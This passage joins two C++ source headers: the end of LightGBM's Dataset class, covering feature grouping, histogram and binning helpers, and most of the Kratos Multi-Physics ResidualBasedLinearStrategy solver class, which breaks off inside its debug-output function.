for (size_t i = 0; i < feature_values.size() && i < static_cast<size_t>(num_total_features_); ++i) {
int feature_idx = used_feature_map_[i];
if (feature_idx >= 0) {
const int group = feature2group_[feature_idx];
const int sub_feature = feature2subfeature_[feature_idx];
feature_groups_[group]->PushData(tid, sub_feature, row_idx, feature_values[i]);
}
}
}
inline void PushOneRow(int tid, data_size_t row_idx, const std::vector<std::pair<int, double>>& feature_values) {
if (is_finish_load_) { return; }
for (auto& inner_data : feature_values) {
if (inner_data.first >= num_total_features_) { continue; }
int feature_idx = used_feature_map_[inner_data.first];
if (feature_idx >= 0) {
const int group = feature2group_[feature_idx];
const int sub_feature = feature2subfeature_[feature_idx];
feature_groups_[group]->PushData(tid, sub_feature, row_idx, inner_data.second);
}
}
}
inline void PushOneData(int tid, data_size_t row_idx, int group, int sub_feature, double value) {
feature_groups_[group]->PushData(tid, sub_feature, row_idx, value);
}
inline int RealFeatureIndex(int fidx) const {
return real_feature_idx_[fidx];
}
inline int InnerFeatureIndex(int col_idx) const {
return used_feature_map_[col_idx];
}
inline int Feature2Group(int feature_idx) const {
return feature2group_[feature_idx];
}
inline int Feture2SubFeature(int feature_idx) const {
return feature2subfeature_[feature_idx];
}
inline uint64_t GroupBinBoundary(int group_idx) const {
return group_bin_boundaries_[group_idx];
}
inline uint64_t NumTotalBin() const {
return group_bin_boundaries_.back();
}
inline std::vector<int> ValidFeatureIndices() const {
std::vector<int> ret;
for (int i = 0; i < num_total_features_; ++i) {
if (used_feature_map_[i] >= 0) {
ret.push_back(i);
}
}
return ret;
}
void ReSize(data_size_t num_data);
void CopySubset(const Dataset* fullset, const data_size_t* used_indices, data_size_t num_used_indices, bool need_meta_data);
LIGHTGBM_EXPORT void FinishLoad();
LIGHTGBM_EXPORT bool SetFloatField(const char* field_name, const float* field_data, data_size_t num_element);
LIGHTGBM_EXPORT bool SetDoubleField(const char* field_name, const double* field_data, data_size_t num_element);
LIGHTGBM_EXPORT bool SetIntField(const char* field_name, const int* field_data, data_size_t num_element);
LIGHTGBM_EXPORT bool GetFloatField(const char* field_name, data_size_t* out_len, const float** out_ptr);
LIGHTGBM_EXPORT bool GetDoubleField(const char* field_name, data_size_t* out_len, const double** out_ptr);
LIGHTGBM_EXPORT bool GetIntField(const char* field_name, data_size_t* out_len, const int** out_ptr);
LIGHTGBM_EXPORT bool GetInt8Field(const char* field_name, data_size_t* out_len, const int8_t** out_ptr);
/*!
* \brief Save current dataset into binary file, will save to "filename.bin"
*/
LIGHTGBM_EXPORT void SaveBinaryFile(const char* bin_filename);
LIGHTGBM_EXPORT void DumpTextFile(const char* text_filename);
LIGHTGBM_EXPORT void CopyFeatureMapperFrom(const Dataset* dataset);
LIGHTGBM_EXPORT void CreateValid(const Dataset* dataset);
void ConstructHistograms(const std::vector<int8_t>& is_feature_used,
const data_size_t* data_indices, data_size_t num_data,
int leaf_idx,
std::vector<std::unique_ptr<OrderedBin>>& ordered_bins,
const score_t* gradients, const score_t* hessians,
score_t* ordered_gradients, score_t* ordered_hessians,
bool is_constant_hessian,
HistogramBinEntry* histogram_data) const;
void FixHistogram(int feature_idx, double sum_gradient, double sum_hessian, data_size_t num_data,
HistogramBinEntry* data) const;
inline data_size_t Split(int feature,
const uint32_t* threshold, int num_threshold, bool default_left,
data_size_t* data_indices, data_size_t num_data,
data_size_t* lte_indices, data_size_t* gt_indices) const {
const int group = feature2group_[feature];
const int sub_feature = feature2subfeature_[feature];
return feature_groups_[group]->Split(sub_feature, threshold, num_threshold, default_left, data_indices, num_data, lte_indices, gt_indices);
}
inline int SubFeatureBinOffset(int i) const {
const int sub_feature = feature2subfeature_[i];
if (sub_feature == 0) {
return 1;
} else {
return 0;
}
}
inline int FeatureNumBin(int i) const {
const int group = feature2group_[i];
const int sub_feature = feature2subfeature_[i];
return feature_groups_[group]->bin_mappers_[sub_feature]->num_bin();
}
inline int8_t FeatureMonotone(int i) const {
if (monotone_types_.empty()) {
return 0;
} else {
return monotone_types_[i];
}
}
inline double FeaturePenalte(int i) const {
if (feature_penalty_.empty()) {
return 1;
} else {
return feature_penalty_[i];
}
}
bool HasMonotone() const {
if (monotone_types_.empty()) {
return false;
} else {
for (size_t i = 0; i < monotone_types_.size(); ++i) {
if (monotone_types_[i] != 0) {
return true;
}
}
return false;
}
}
inline int FeatureGroupNumBin(int group) const {
return feature_groups_[group]->num_total_bin_;
}
inline const BinMapper* FeatureBinMapper(int i) const {
const int group = feature2group_[i];
const int sub_feature = feature2subfeature_[i];
return feature_groups_[group]->bin_mappers_[sub_feature].get();
}
inline const Bin* FeatureBin(int i) const {
const int group = feature2group_[i];
return feature_groups_[group]->bin_data_.get();
}
inline const Bin* FeatureGroupBin(int group) const {
return feature_groups_[group]->bin_data_.get();
}
inline bool FeatureGroupIsSparse(int group) const {
return feature_groups_[group]->is_sparse_;
}
inline BinIterator* FeatureIterator(int i) const {
const int group = feature2group_[i];
const int sub_feature = feature2subfeature_[i];
return feature_groups_[group]->SubFeatureIterator(sub_feature);
}
inline BinIterator* FeatureGroupIterator(int group) const {
return feature_groups_[group]->FeatureGroupIterator();
}
inline double RealThreshold(int i, uint32_t threshold) const {
const int group = feature2group_[i];
const int sub_feature = feature2subfeature_[i];
return feature_groups_[group]->bin_mappers_[sub_feature]->BinToValue(threshold);
}
// given a real threshold, find the closest threshold bin
inline uint32_t BinThreshold(int i, double threshold_double) const {
const int group = feature2group_[i];
const int sub_feature = feature2subfeature_[i];
return feature_groups_[group]->bin_mappers_[sub_feature]->ValueToBin(threshold_double);
}
inline void CreateOrderedBins(std::vector<std::unique_ptr<OrderedBin>>* ordered_bins) const {
ordered_bins->resize(num_groups_);
OMP_INIT_EX();
#pragma omp parallel for schedule(guided)
for (int i = 0; i < num_groups_; ++i) {
OMP_LOOP_EX_BEGIN();
ordered_bins->at(i).reset(feature_groups_[i]->bin_data_->CreateOrderedBin());
OMP_LOOP_EX_END();
}
OMP_THROW_EX();
}
/*!
* \brief Get meta data pointer
* \return Pointer of meta data
*/
inline const Metadata& metadata() const { return metadata_; }
/*! \brief Get Number of used features */
inline int num_features() const { return num_features_; }
/*! \brief Get Number of feature groups */
inline int num_feature_groups() const { return num_groups_;}
/*! \brief Get Number of total features */
inline int num_total_features() const { return num_total_features_; }
/*! \brief Get the index of label column */
inline int label_idx() const { return label_idx_; }
/*! \brief Get names of current data set */
inline const std::vector<std::string>& feature_names() const { return feature_names_; }
inline void set_feature_names(const std::vector<std::string>& feature_names) {
if (feature_names.size() != static_cast<size_t>(num_total_features_)) {
Log::Fatal("Size of feature_names error, should equal with total number of features");
}
feature_names_ = std::vector<std::string>(feature_names);
// replace ' ' in feature_names with '_'
bool spaceInFeatureName = false;
for (auto& feature_name : feature_names_) {
if (feature_name.find(' ') != std::string::npos) {
spaceInFeatureName = true;
std::replace(feature_name.begin(), feature_name.end(), ' ', '_');
}
}
if (spaceInFeatureName) {
Log::Warning("Find whitespaces in feature_names, replace with underlines");
}
}
inline std::vector<std::string> feature_infos() const {
std::vector<std::string> bufs;
for (int i = 0; i < num_total_features_; i++) {
int fidx = used_feature_map_[i];
if (fidx == -1) {
bufs.push_back("none");
} else {
const auto bin_mapper = FeatureBinMapper(fidx);
bufs.push_back(bin_mapper->bin_info());
}
}
return bufs;
}
void ResetConfig(const char* parameters);
/*! \brief Get Number of data */
inline data_size_t num_data() const { return num_data_; }
/*! \brief Disable copy */
Dataset& operator=(const Dataset&) = delete;
/*! \brief Disable copy */
Dataset(const Dataset&) = delete;
void addFeaturesFrom(Dataset* other);
private:
std::string data_filename_;
/*! \brief Store used features */
std::vector<std::unique_ptr<FeatureGroup>> feature_groups_;
/*! \brief Mapper from real feature index to used index*/
std::vector<int> used_feature_map_;
/*! \brief Number of used features*/
int num_features_;
/*! \brief Number of total features*/
int num_total_features_;
/*! \brief Number of total data*/
data_size_t num_data_;
/*! \brief Store some label level data*/
Metadata metadata_;
/*! \brief index of label column */
int label_idx_ = 0;
/*! \brief Threshold for treating a feature as a sparse feature */
double sparse_threshold_;
/*! \brief store feature names */
std::vector<std::string> feature_names_;
/*! \brief store feature names */
static const char* binary_file_token;
int num_groups_;
std::vector<int> real_feature_idx_;
std::vector<int> feature2group_;
std::vector<int> feature2subfeature_;
std::vector<uint64_t> group_bin_boundaries_;
std::vector<int> group_feature_start_;
std::vector<int> group_feature_cnt_;
std::vector<int8_t> monotone_types_;
std::vector<double> feature_penalty_;
bool is_finish_load_;
int max_bin_;
int bin_construct_sample_cnt_;
int min_data_in_bin_;
bool use_missing_;
bool zero_as_missing_;
};
} // namespace LightGBM
#endif // LightGBM_DATA_H_
|
residualbased_linear_strategy.h | // | / |
// ' / __| _` | __| _ \ __|
// . \ | ( | | ( |\__ `
// _|\_\_| \__,_|\__|\___/ ____/
// Multi-Physics
//
// License: BSD License
// Kratos default license: kratos/license.txt
//
// Main authors: Riccardo Rossi
//
//
#if !defined(KRATOS_RESIDUALBASED_LINEAR_STRATEGY )
#define KRATOS_RESIDUALBASED_LINEAR_STRATEGY
// System includes
// External includes
// Project includes
#include "includes/define.h"
#include "solving_strategies/strategies/solving_strategy.h"
#include "utilities/builtin_timer.h"
//default builder and solver
#include "solving_strategies/builder_and_solvers/builder_and_solver.h"
#include "solving_strategies/builder_and_solvers/residualbased_block_builder_and_solver.h"
namespace Kratos
{
///@name Kratos Globals
///@{
///@}
///@name Type Definitions
///@{
///@}
///@name Enum's
///@{
///@}
///@name Functions
///@{
///@}
///@name Kratos Classes
///@{
/**
* @class ResidualBasedLinearStrategy
* @ingroup KratosCore
* @brief This is a very simple strategy to solve linearly the problem
* @details As a linear strategy the check on the convergence is not done and just one non linear iteration will be performed
* @author Riccardo Rossi
*/
template<class TSparseSpace,
class TDenseSpace, //= DenseSpace<double>,
class TLinearSolver //= LinearSolver<TSparseSpace,TDenseSpace>
>
class ResidualBasedLinearStrategy
: public SolvingStrategy<TSparseSpace, TDenseSpace, TLinearSolver>
{
public:
///@name Type Definitions */
///@{
/** Counted pointer of ClassName */
KRATOS_CLASS_POINTER_DEFINITION(ResidualBasedLinearStrategy);
typedef SolvingStrategy<TSparseSpace, TDenseSpace, TLinearSolver> BaseType;
typedef typename BaseType::TDataType TDataType;
typedef TSparseSpace SparseSpaceType;
typedef typename BaseType::TSchemeType TSchemeType;
typedef typename BaseType::TBuilderAndSolverType TBuilderAndSolverType;
typedef typename BaseType::DofsArrayType DofsArrayType;
typedef typename BaseType::TSystemMatrixType TSystemMatrixType;
typedef typename BaseType::TSystemVectorType TSystemVectorType;
typedef typename BaseType::LocalSystemVectorType LocalSystemVectorType;
typedef typename BaseType::LocalSystemMatrixType LocalSystemMatrixType;
typedef typename BaseType::TSystemMatrixPointerType TSystemMatrixPointerType;
typedef typename BaseType::TSystemVectorPointerType TSystemVectorPointerType;
///@}
///@name Life Cycle
///@{
/**
* Default constructor
* @param rModelPart The model part of the problem
* @param pScheme The integration scheme
* @param pNewLinearSolver The linear solver employed
* @param CalculateReactionFlag The flag for the reaction calculation
* @param ReformDofSetAtEachStep The flag that allows to compute the modification of the DOF
* @param CalculateNormDxFlag The flag sets if the norm of Dx is computed
* @param MoveMeshFlag The flag that allows to move the mesh
*/
ResidualBasedLinearStrategy(
ModelPart& rModelPart,
typename TSchemeType::Pointer pScheme,
typename TLinearSolver::Pointer pNewLinearSolver,
bool CalculateReactionFlag = false,
bool ReformDofSetAtEachStep = false,
bool CalculateNormDxFlag = false,
bool MoveMeshFlag = false
)
: SolvingStrategy<TSparseSpace, TDenseSpace, TLinearSolver>(rModelPart, MoveMeshFlag)
{
KRATOS_TRY
mCalculateReactionsFlag = CalculateReactionFlag;
mReformDofSetAtEachStep = ReformDofSetAtEachStep;
mCalculateNormDxFlag = CalculateNormDxFlag;
// Saving the scheme
mpScheme = pScheme;
// Saving the linear solver
mpLinearSolver = pNewLinearSolver;
// Setting up the default builder and solver
mpBuilderAndSolver = typename TBuilderAndSolverType::Pointer
(
new ResidualBasedBlockBuilderAndSolver<TSparseSpace, TDenseSpace, TLinearSolver > (mpLinearSolver)
);
// Set flag to start correcty the calculations
mSolutionStepIsInitialized = false;
mInitializeWasPerformed = false;
// Tells to the builder and solver if the reactions have to be Calculated or not
GetBuilderAndSolver()->SetCalculateReactionsFlag(mCalculateReactionsFlag);
// Tells to the Builder And Solver if the system matrix and vectors need to
//be reshaped at each step or not
GetBuilderAndSolver()->SetReshapeMatrixFlag(mReformDofSetAtEachStep);
// Set EchoLevel to the default value (only time is displayed)
this->SetEchoLevel(1);
// By default the matrices are rebuilt at each solution step
BaseType::SetRebuildLevel(1);
KRATOS_CATCH("")
}
/**
* Constructor specifying the builder and solver
* @param rModelPart The model part of the problem
* @param pScheme The integration scheme
* @param pNewLinearSolver The linear solver employed
* @param pNewBuilderAndSolver The builder and solver employed
* @param CalculateReactionFlag The flag for the reaction calculation
* @param ReformDofSetAtEachStep The flag that allows to compute the modification of the DOF
* @param CalculateNormDxFlag The flag sets if the norm of Dx is computed
* @param MoveMeshFlag The flag that allows to move the mesh
*/
ResidualBasedLinearStrategy(
ModelPart& rModelPart,
typename TSchemeType::Pointer pScheme,
typename TLinearSolver::Pointer pNewLinearSolver,
typename TBuilderAndSolverType::Pointer pNewBuilderAndSolver,
bool CalculateReactionFlag = false,
bool ReformDofSetAtEachStep = false,
bool CalculateNormDxFlag = false,
bool MoveMeshFlag = false
)
: SolvingStrategy<TSparseSpace, TDenseSpace, TLinearSolver>(rModelPart, MoveMeshFlag)
{
KRATOS_TRY
mCalculateReactionsFlag = CalculateReactionFlag;
mReformDofSetAtEachStep = ReformDofSetAtEachStep;
mCalculateNormDxFlag = CalculateNormDxFlag;
// Saving the scheme
mpScheme = pScheme;
// Saving the linear solver
mpLinearSolver = pNewLinearSolver;
// Setting up the builder and solver
mpBuilderAndSolver = pNewBuilderAndSolver;
// Set flag to start correcty the calculations
mSolutionStepIsInitialized = false;
mInitializeWasPerformed = false;
// Tells to the builder and solver if the reactions have to be Calculated or not
GetBuilderAndSolver()->SetCalculateReactionsFlag(mCalculateReactionsFlag);
// Tells to the Builder And Solver if the system matrix and vectors need to
//be reshaped at each step or not
GetBuilderAndSolver()->SetReshapeMatrixFlag(mReformDofSetAtEachStep);
//set EchoLevel to the default value (only time is displayed)
this->SetEchoLevel(1);
// By default the matrices are rebuilt at each solution step
BaseType::SetRebuildLevel(1);
KRATOS_CATCH("")
}
/**
* @brief Destructor.
* @details In trilinos third party library, the linear solver's preconditioner should be freed before the system matrix. We control the deallocation order with Clear().
*/
~ResidualBasedLinearStrategy() override
{
// If the linear solver has not been deallocated, clean it before
// deallocating mpA. This prevents a memory error with the the ML
// solver (which holds a reference to it).
auto p_linear_solver = GetBuilderAndSolver()->GetLinearSystemSolver();
if (p_linear_solver != nullptr) p_linear_solver->Clear();
// Deallocating system vectors to avoid errors in MPI. Clear calls
// TrilinosSpace::Clear for the vectors, which preserves the Map of
// current vectors, performing MPI calls in the process. Due to the
// way Python garbage collection works, this may happen after
// MPI_Finalize has already been called and is an error. Resetting
// the pointers here prevents Clear from operating with the
// (now deallocated) vectors.
mpA.reset();
mpDx.reset();
mpb.reset();
this->Clear();
}
/**
* @brief Set method for the time scheme
* @param pScheme The pointer to the time scheme considered
*/
void SetScheme(typename TSchemeType::Pointer pScheme)
{
mpScheme = pScheme;
};
/**
* @brief Get method for the time scheme
* @return mpScheme: The pointer to the time scheme considered
*/
typename TSchemeType::Pointer GetScheme()
{
return mpScheme;
};
/**
* @brief Set method for the builder and solver
* @param pNewBuilderAndSolver The pointer to the builder and solver considered
*/
void SetBuilderAndSolver(typename TBuilderAndSolverType::Pointer pNewBuilderAndSolver)
{
mpBuilderAndSolver = pNewBuilderAndSolver;
};
/**
* @brief Get method for the builder and solver
* @return mpBuilderAndSolver: The pointer to the builder and solver considered
*/
typename TBuilderAndSolverType::Pointer GetBuilderAndSolver()
{
return mpBuilderAndSolver;
};
/**
* @brief This method sets the flag mCalculateReactionsFlag
* @param CalculateReactionsFlag The flag that tells if the reactions are computed
*/
void SetCalculateReactionsFlag(bool CalculateReactionsFlag)
{
mCalculateReactionsFlag = CalculateReactionsFlag;
GetBuilderAndSolver()->SetCalculateReactionsFlag(mCalculateReactionsFlag);
}
/**
* @brief This method returns the flag mCalculateReactionsFlag
* @return The flag that tells if the reactions are computed
*/
bool GetCalculateReactionsFlag()
{
return mCalculateReactionsFlag;
}
/**
* @brief This method sets the flag mReformDofSetAtEachStep
* @param Flag The flag that tells if each time step the system is rebuilt
*/
void SetReformDofSetAtEachStepFlag(bool Flag)
{
mReformDofSetAtEachStep = Flag;
GetBuilderAndSolver()->SetReshapeMatrixFlag(mReformDofSetAtEachStep);
}
/**
* @brief This method returns the flag mReformDofSetAtEachStep
* @return The flag that tells if each time step the system is rebuilt
*/
bool GetReformDofSetAtEachStepFlag()
{
return mReformDofSetAtEachStep;
}
/**
* @brief It sets the level of echo for the solving strategy
* @param Level The level to set
* @details The different levels of echo are:
* - 0: Mute... no echo at all
* - 1: Printing time and basic informations
* - 2: Printing linear solver data
* - 3: Print of debug informations: Echo of stiffness matrix, Dx, b...
*/
void SetEchoLevel(int Level) override
{
BaseType::SetEchoLevel(Level);
GetBuilderAndSolver()->SetEchoLevel(Level);
}
//*********************************************************************************
/**OPERATIONS ACCESSIBLE FROM THE INPUT:*/
/**
* @brief Operation to predict the solution ... if it is not called a trivial predictor is used in which the
values of the solution step of interest are assumed equal to the old values
*/
void Predict() override
{
KRATOS_TRY
const DataCommunicator &r_comm = BaseType::GetModelPart().GetCommunicator().GetDataCommunicator();
//OPERATIONS THAT SHOULD BE DONE ONCE - internal check to avoid repetitions
//if the operations needed were already performed this does nothing
if(mInitializeWasPerformed == false)
Initialize();
//initialize solution step
if (mSolutionStepIsInitialized == false)
InitializeSolutionStep();
TSystemMatrixType& rA = *mpA;
TSystemVectorType& rDx = *mpDx;
TSystemVectorType& rb = *mpb;
DofsArrayType& r_dof_set = GetBuilderAndSolver()->GetDofSet();
this->GetScheme()->Predict(BaseType::GetModelPart(), r_dof_set, rA, rDx, rb);
auto& r_constraints_array = BaseType::GetModelPart().MasterSlaveConstraints();
const int local_number_of_constraints = r_constraints_array.size();
const int global_number_of_constraints = r_comm.SumAll(local_number_of_constraints);
if(global_number_of_constraints != 0) {
const auto& rProcessInfo = BaseType::GetModelPart().GetProcessInfo();
auto it_begin = BaseType::GetModelPart().MasterSlaveConstraints().begin();
#pragma omp parallel for firstprivate(it_begin)
for(int i=0; i<static_cast<int>(local_number_of_constraints); ++i)
(it_begin+i)->ResetSlaveDofs(rProcessInfo);
#pragma omp parallel for firstprivate(it_begin)
for(int i=0; i<static_cast<int>(local_number_of_constraints); ++i)
(it_begin+i)->Apply(rProcessInfo);
//the following is needed since we need to eventually compute time derivatives after applying
//Master slave relations
TSparseSpace::SetToZero(rDx);
this->GetScheme()->Update(BaseType::GetModelPart(), r_dof_set, rA, rDx, rb);
}
if (BaseType::MoveMeshFlag() == true) BaseType::MoveMesh();
KRATOS_CATCH("")
}
/**
* @brief Initialization of member variables and prior operations
*/
void Initialize() override
{
KRATOS_TRY
if (mInitializeWasPerformed == false)
{
//pointers needed in the solution
typename TSchemeType::Pointer p_scheme = GetScheme();
//Initialize The Scheme - OPERATIONS TO BE DONE ONCE
if (p_scheme->SchemeIsInitialized() == false)
p_scheme->Initialize(BaseType::GetModelPart());
//Initialize The Elements - OPERATIONS TO BE DONE ONCE
if (p_scheme->ElementsAreInitialized() == false)
p_scheme->InitializeElements(BaseType::GetModelPart());
//Initialize The Conditions - OPERATIONS TO BE DONE ONCE
if (p_scheme->ConditionsAreInitialized() == false)
p_scheme->InitializeConditions(BaseType::GetModelPart());
mInitializeWasPerformed = true;
}
KRATOS_CATCH("")
}
/**
* @brief The problem of interest is solved
* @details a double containing norm(Dx) is returned if CalculateNormDxFlag == true, else 0 is returned
* @return norm(Dx)
*/
double Solve() override
{
BaseType::Solve();
//calculate if needed the norm of Dx
double norm_dx = 0.00;
if (mCalculateNormDxFlag == true)
norm_dx = TSparseSpace::TwoNorm(*mpDx);
return norm_dx;
}
/**
* @brief Clears the internal storage
* @note NULL could be changed to nullptr in the future (c++11)
*/
void Clear() override
{
KRATOS_TRY;
// If the preconditioner is saved between solves, it
// should be cleared here.
GetBuilderAndSolver()->GetLinearSystemSolver()->Clear();
if (mpA != NULL)
SparseSpaceType::Clear(mpA);
if (mpDx != NULL)
SparseSpaceType::Clear(mpDx);
if (mpb != NULL)
SparseSpaceType::Clear(mpb);
// Setting to zero the internal flag to ensure that the dof sets are recalculated
GetBuilderAndSolver()->SetDofSetIsInitializedFlag(false);
GetBuilderAndSolver()->Clear();
GetScheme()->Clear();
mInitializeWasPerformed = false;
mSolutionStepIsInitialized = false;
KRATOS_CATCH("");
}
/**
* @brief This operations should be called before printing the results when non trivial results (e.g. stresses)
need to be calculated given the solution of the step
*@details This operations should be called only when needed, before printing as it can involve a non negligible cost
*/
void CalculateOutputData() override
{
TSystemMatrixType& rA = *mpA;
TSystemVectorType& rDx = *mpDx;
TSystemVectorType& rb = *mpb;
GetScheme()->CalculateOutputData(BaseType::GetModelPart(),
GetBuilderAndSolver()->GetDofSet(),
rA, rDx, rb);
}
/**
* @brief Performs all the required operations that should be done (for each step) before solving the solution step.
* @details A member variable should be used as a flag to make sure this function is called only once per step.
* @todo Boost dependencies should be replaced by std equivalent
*/
void InitializeSolutionStep() override
{
KRATOS_TRY
if (mSolutionStepIsInitialized == false)
{
//pointers needed in the solution
typename TSchemeType::Pointer p_scheme = GetScheme();
typename TBuilderAndSolverType::Pointer p_builder_and_solver = GetBuilderAndSolver();
const int rank = BaseType::GetModelPart().GetCommunicator().MyPID();
//set up the system, operation performed just once unless it is required
//to reform the dof set at each iteration
BuiltinTimer system_construction_time;
if (p_builder_and_solver->GetDofSetIsInitializedFlag() == false ||
mReformDofSetAtEachStep == true)
{
//setting up the list of the DOFs to be solved
BuiltinTimer setup_dofs_time;
p_builder_and_solver->SetUpDofSet(p_scheme, BaseType::GetModelPart());
KRATOS_INFO_IF("Setup Dofs Time", BaseType::GetEchoLevel() > 0 && rank == 0)
<< setup_dofs_time.ElapsedSeconds() << std::endl;
//shaping correctly the system
BuiltinTimer setup_system_time;
p_builder_and_solver->SetUpSystem(BaseType::GetModelPart());
KRATOS_INFO_IF("Setup System Time", BaseType::GetEchoLevel() > 0 && rank == 0)
<< setup_system_time.ElapsedSeconds() << std::endl;
//setting up the Vectors involved to the correct size
BuiltinTimer system_matrix_resize_time;
p_builder_and_solver->ResizeAndInitializeVectors(p_scheme, mpA, mpDx, mpb,
BaseType::GetModelPart());
KRATOS_INFO_IF("System Matrix Resize Time", BaseType::GetEchoLevel() > 0 && rank == 0)
<< system_matrix_resize_time.ElapsedSeconds() << std::endl;
}
KRATOS_INFO_IF("System Construction Time", BaseType::GetEchoLevel() > 0 && rank == 0)
<< system_construction_time.ElapsedSeconds() << std::endl;
TSystemMatrixType& rA = *mpA;
TSystemVectorType& rDx = *mpDx;
TSystemVectorType& rb = *mpb;
//initial operations ... things that are constant over the Solution Step
p_builder_and_solver->InitializeSolutionStep(BaseType::GetModelPart(), rA, rDx, rb);
//initial operations ... things that are constant over the Solution Step
p_scheme->InitializeSolutionStep(BaseType::GetModelPart(), rA, rDx, rb);
mSolutionStepIsInitialized = true;
}
KRATOS_CATCH("")
}
/**
* @brief Performs all the required operations that should be done (for each step) after solving the solution step.
* @details A member variable should be used as a flag to make sure this function is called only once per step.
*/
void FinalizeSolutionStep() override
{
KRATOS_TRY;
typename TSchemeType::Pointer p_scheme = GetScheme();
typename TBuilderAndSolverType::Pointer p_builder_and_solver = GetBuilderAndSolver();
TSystemMatrixType &rA = *mpA;
TSystemVectorType &rDx = *mpDx;
TSystemVectorType &rb = *mpb;
//Finalisation of the solution step,
//operations to be done after achieving convergence, for example the
//Final Residual Vector (mb) has to be saved in there
//to avoid error accumulation
p_scheme->FinalizeSolutionStep(BaseType::GetModelPart(), rA, rDx, rb);
p_builder_and_solver->FinalizeSolutionStep(BaseType::GetModelPart(), rA, rDx, rb);
//Cleaning memory after the solution
p_scheme->Clean();
//reset flags for next step
mSolutionStepIsInitialized = false;
//deallocate the systemvectors if needed
if (mReformDofSetAtEachStep == true)
{
SparseSpaceType::Clear(mpA);
SparseSpaceType::Clear(mpDx);
SparseSpaceType::Clear(mpb);
this->Clear();
}
KRATOS_CATCH("");
}
/**
* @brief Solves the current step. This function returns true if a solution has been found, false otherwise.
*/
bool SolveSolutionStep() override
{
//pointers needed in the solution
typename TSchemeType::Pointer p_scheme = GetScheme();
typename TBuilderAndSolverType::Pointer p_builder_and_solver = GetBuilderAndSolver();
TSystemMatrixType& rA = *mpA;
TSystemVectorType& rDx = *mpDx;
TSystemVectorType& rb = *mpb;
p_scheme->InitializeNonLinIteration(BaseType::GetModelPart(), rA, rDx, rb);
if (BaseType::mRebuildLevel > 0 || BaseType::mStiffnessMatrixIsBuilt == false)
{
TSparseSpace::SetToZero(rA);
TSparseSpace::SetToZero(rDx);
TSparseSpace::SetToZero(rb);
// passing smart pointers instead of references here
// to prevent dangling pointer to system matrix when
// reusing ml preconditioners in the trilinos tpl
p_builder_and_solver->BuildAndSolve(p_scheme, BaseType::GetModelPart(), rA, rDx, rb);
BaseType::mStiffnessMatrixIsBuilt = true;
}
else
{
TSparseSpace::SetToZero(rDx);
TSparseSpace::SetToZero(rb);
p_builder_and_solver->BuildRHSAndSolve(p_scheme, BaseType::GetModelPart(), rA, rDx, rb);
}
// Debugging info
EchoInfo();
//update results
DofsArrayType& r_dof_set = p_builder_and_solver->GetDofSet();
p_scheme->Update(BaseType::GetModelPart(), r_dof_set, rA, rDx, rb);
//move the mesh if needed
if (BaseType::MoveMeshFlag() == true) BaseType::MoveMesh();
p_scheme->FinalizeNonLinIteration(BaseType::GetModelPart(), rA, rDx, rb);
// Calculate reactions if required
if (mCalculateReactionsFlag == true)
p_builder_and_solver->CalculateReactions(p_scheme,
BaseType::GetModelPart(),
rA, rDx, rb);
return true;
}
/**
* @brief This method returns the LHS matrix
* @return The LHS matrix
*/
TSystemMatrixType& GetSystemMatrix()
{
TSystemMatrixType& mA = *mpA;
return mA;
}
/**
* @brief This method returns the RHS vector
* @return The RHS vector
*/
TSystemVectorType& GetSystemVector()
{
TSystemVectorType& mb = *mpb;
return mb;
}
/**
* @brief This method returns the solution vector
* @return The Dx vector
*/
TSystemVectorType& GetSolutionVector()
{
TSystemVectorType& mDx = *mpDx;
return mDx;
}
/**
* @brief This method returns the residual norm
* @return The residual norm
*/
double GetResidualNorm() override
{
if (TSparseSpace::Size(*mpb) != 0)
return TSparseSpace::TwoNorm(*mpb);
else
return 0.0;
}
/**
* @brief Function to perform expensive checks.
* @details It is designed to be called ONCE to verify that the input is correct.
*/
int Check() override
{
KRATOS_TRY
BaseType::Check();
GetBuilderAndSolver()->Check(BaseType::GetModelPart());
GetScheme()->Check(BaseType::GetModelPart());
return 0;
KRATOS_CATCH("")
}
///@}
///@name Operators
///@{
///@}
///@name Operations
///@{
///@}
///@name Access
///@{
///@}
///@name Inquiry
///@{
///@}
///@name Input and output
///@{
/// Turn back information as a string.
std::string Info() const override
{
return "ResidualBasedLinearStrategy";
}
/// Print information about this object.
void PrintInfo(std::ostream& rOStream) const override
{
rOStream << Info();
}
/// Print object's data.
void PrintData(std::ostream& rOStream) const override
{
rOStream << Info();
}
///@}
///@name Friends
///@{
///@}
protected:
///@name Protected static Member Variables
///@{
///@}
///@name Protected member Variables
///@{
///@}
///@name Protected Operators
///@{
///@}
///@name Protected Operations
///@{
///@}
///@name Protected Access
///@{
///@}
///@name Protected Inquiry
///@{
///@}
///@name Protected LifeCycle
///@{
///@}
private:
///@name Static Member Variables
///@{
///@}
///@name Member Variables
///@{
typename TLinearSolver::Pointer mpLinearSolver; /// The pointer to the linear solver considered
typename TSchemeType::Pointer mpScheme; /// The pointer to the time scheme employed
typename TBuilderAndSolverType::Pointer mpBuilderAndSolver; /// The pointer to the builder and solver employed
TSystemVectorPointerType mpDx; /// The incremement in the solution
TSystemVectorPointerType mpb; /// The RHS vector of the system of equations
TSystemMatrixPointerType mpA; /// The LHS matrix of the system of equations
/**
* @brief Flag telling if it is needed to reform the DofSet at each
solution step or if it is possible to form it just once
* @details Default = false
- true : Reforme at each time step
- false : Form just one (more efficient)
*/
bool mReformDofSetAtEachStep;
bool mCalculateNormDxFlag; /// Calculates if required the norm of the correction term Dx
/**
* @brief Flag telling if it is needed or not to compute the reactions
* @details default = true
*/
bool mCalculateReactionsFlag;
bool mSolutionStepIsInitialized; /// Flag to set as initialized the solution step
bool mInitializeWasPerformed; /// Flag to set as initialized the strategy
///@}
///@name Private Operators*/
///@{
/**
* @brief This method returns the components of the system of equations depending of the echo level
*/
virtual void EchoInfo()
{
TSystemMatrixType& rA = *mpA;
TSystemVectorType& rDx = *mpDx;
TSystemVectorType& rb = *mpb;
if (BaseType::GetEchoLevel() == 3) //if it is needed to print the debug info
{
KRATOS_INFO("LHS") << "SystemMatrix = " << rA << std::endl;
KRATOS_INFO("Dx") << "Solution obtained = " << rDx << std::endl;
KRATOS_INFO("RHS") << "RHS = " << rb << std::endl;
}
if (this->GetEchoLevel() == 4) //print to matrix market file
{
std::stringstream matrix_market_name;
matrix_market_name << "A_" << BaseType::GetModelPart().GetProcessInfo()[TIME] << ".mm";
TSparseSpace::WriteMatrixMarketMatrix((char*) (matrix_market_name.str()).c_str(), rA, false);
std::stringstream matrix_market_vectname;
matrix_market_vectname << "b_" << BaseType::GetModelPart().GetProcessInfo()[TIME] << ".mm.rhs";
